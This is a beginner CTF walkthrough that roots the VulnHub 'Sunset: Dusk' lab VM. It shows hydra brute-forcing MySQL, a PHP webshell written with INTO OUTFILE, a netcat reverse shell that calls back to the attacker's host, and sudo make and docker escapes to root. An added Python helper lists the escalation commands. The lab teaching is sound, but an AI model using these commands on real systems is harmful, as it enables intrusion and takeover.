Sunset: Dusk Walkthrough


Hello everyone, let's begin.

CTF link: https://www.vulnhub.com/entry/sunset-dusk,404/

Download link: https://download.vulnhub.com/sunset/dusk.7z

I imported it into VirtualBox with a bridged network on the interface named vmnet8 (172.16.59.0/24).

CTF level: beginner to intermediate

Vulnerabilities to exploit: default MySQL root credentials, MySQL file write (SELECT ... INTO OUTFILE) into a directory served by the web server, sudo NOPASSWD on make, and docker group membership

Techniques and tools: arp-scan, nmap, hydra (FuzzDB default_users.txt and default_pass.txt), Firefox, ssh, mysql, netcat, GTFOBins

Total flags: 2

I found the target's IP using arp-scan:
sudo arp-scan --interface vmnet8 --local

The CTF machine's IP is 172.16.59.148.


I scanned the 1000 most common ports with version detection (banner grabbing) using nmap:
sudo nmap -sSV 172.16.59.148

I also tried nmap's aggressive (-A) and vuln script scans, nikto, dirb and site mapping with Burp, but none of them turned up anything useful.

Opening http://172.16.59.148:8080 in Firefox showed a directory listing.


I started brute-forcing MySQL with the FuzzDB wordlists default_users.txt and default_pass.txt.

Note: if the CTF machine starts blocking your MySQL login requests, restart it. -t 1 keeps hydra to a single connection at a time, and -f stops it at the first valid pair.
hydra -vV -t 1 -f -L default_users.txt -P default_pass.txt 172.16.59.148 mysql
hydra found a valid username and password:
Service: MySQL
Login: root
Password: password

I logged into MySQL with those credentials and used SELECT ... INTO OUTFILE to write a PHP shell into the directory that is served on port 8080. I took help from here: Mr Jamie Bowman
SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/tmp/shell1.php";

This only works because secure_file_priv is not restricting INTO OUTFILE and the mysqld process itself has write access to /var/tmp; on a hardened server INTO OUTFILE is confined to one directory or disabled outright, and the web root is not writable by the database user.
The resulting /var/tmp/shell1.php runs whatever is passed in the cmd GET parameter as a shell command on the target.
To check that the file had actually been written, I refreshed the directory listing at http://172.16.59.148:8080.


Without a second thought, I went for a netcat reverse shell.
I started a netcat listener on my machine:
nc -lvp 1234

Then, from the browser, I told the webshell to connect back to me with a bash shell (Firefox percent-encodes the spaces in the command for you):
172.16.59.148:8080/shell1.php?cmd=nc -np 172.16.59.1 1234 -e /bin/bash

I got a shell, but not an interactive one. To upgrade it to a proper TTY I used python:
python -c 'import pty;pty.spawn("/bin/bash");'

I could have looked for the first flag right away, but I prefer to escalate privileges first.
sudo -l
This showed that I could run a few binaries as the user 'dusk' with no password:

/usr/bin/ping, /usr/bin/make, /usr/bin/sl
I looked each of them up on GTFOBins for a way to spawn another shell and found a sudo entry for make:
sudo -u dusk make --eval=$'x:\n\t-'"/bin/bash" 

Note that this gives a shell as dusk, not root. I could see that this user belongs to the docker group, so I went back to GTFOBins for docker and found this one-liner, which mounts the host filesystem into a container and chroots into it (it needs the alpine image to be present locally or pullable from the machine):
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
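The two escalation checks above (sudo -l for NOPASSWD binaries with a GTFOBins escape, and group membership for docker), as an added Python example that is not part of the original walkthrough. The sudo -l and id samples inside it are constructed to resemble what the box returns; the www-data account name, the exact sudoers wording and the docker gid are assumptions, and the escape commands are the ones quoted in the walkthrough.

```python
"""Triage `sudo -l` and `id` output for the escalation paths used on Dusk.

Added example, not part of the walkthrough. The one-liners are the ones the
walkthrough quotes from GTFOBins; the sample tool output is constructed.
"""
from __future__ import annotations

import re

# Shell escapes for binaries that may show up under sudo (a subset of GTFOBins).
# ping and sl have no sudo escape on GTFOBins, so they are deliberately absent.
SUDO_ESCAPES = {
    "make": "sudo -u {user} make --eval=$'x:\\n\\t-'\"/bin/bash\"",
}
# docker group members can mount / into a container and chroot into it: root on the host.
DOCKER_ESCAPE = "docker run -v /:/mnt --rm -it alpine chroot /mnt sh"

# Constructed sample output modelled on the walkthrough (assumed: the webshell
# runs as www-data; the sudoers wording and the docker gid are guesses).
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on dusk:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
"""
# `id` as run after the make escape, i.e. as dusk.
SAMPLE_ID = "uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),999(docker)"

# One sudoers rule line: "(runas[:group]) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text: str) -> list[dict]:
    """Return one dict per rule line: run-as user, NOPASSWD flag, listed binaries."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),  # "(dusk : docker)" -> dusk
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "cmds": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
        })
    return rules


def sudo_escapes(rules: list[dict]) -> list[tuple[str, str]]:
    """Pair every NOPASSWD binary that has a known escape with the command to run."""
    hits = []
    for rule in rules:
        if not rule["nopasswd"]:
            continue  # only passwordless rules are usable without a credential
        for path in rule["cmds"]:
            name = path.rsplit("/", 1)[-1]
            if name in SUDO_ESCAPES:
                hits.append((path, SUDO_ESCAPES[name].format(user=rule["runas"])))
    return hits


def in_docker_group(id_output: str) -> bool:
    """True when the groups= list of `id` names docker."""
    m = re.search(r"groups=(\S+)", id_output)
    return bool(m) and "(docker)" in m.group(1)


def triage(sudo_l: str, id_output: str) -> list[str]:
    """Escalation commands worth trying, in the order the walkthrough used them."""
    steps = [cmd for _, cmd in sudo_escapes(parse_sudo_l(sudo_l))]
    if in_docker_group(id_output):
        steps.append(DOCKER_ESCAPE)
    return steps


if __name__ == "__main__":
    for step in triage(SAMPLE_SUDO_L, SAMPLE_ID):
        print(step)
```

Paste the real sudo -l and id output in place of the constructed samples; the parser only keys on the "(runas) TAG: cmds" rule lines, so the Defaults block and the "User ... may run" banner are ignored. The docker check belongs to the account you land on after the sudo hop, which is why the walkthrough only finds it once it is dusk.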

Finally, I'm root. Now it's time to collect the flags, which are in two places:
cat /home/dusk/user.txt
cat /root/root.txt


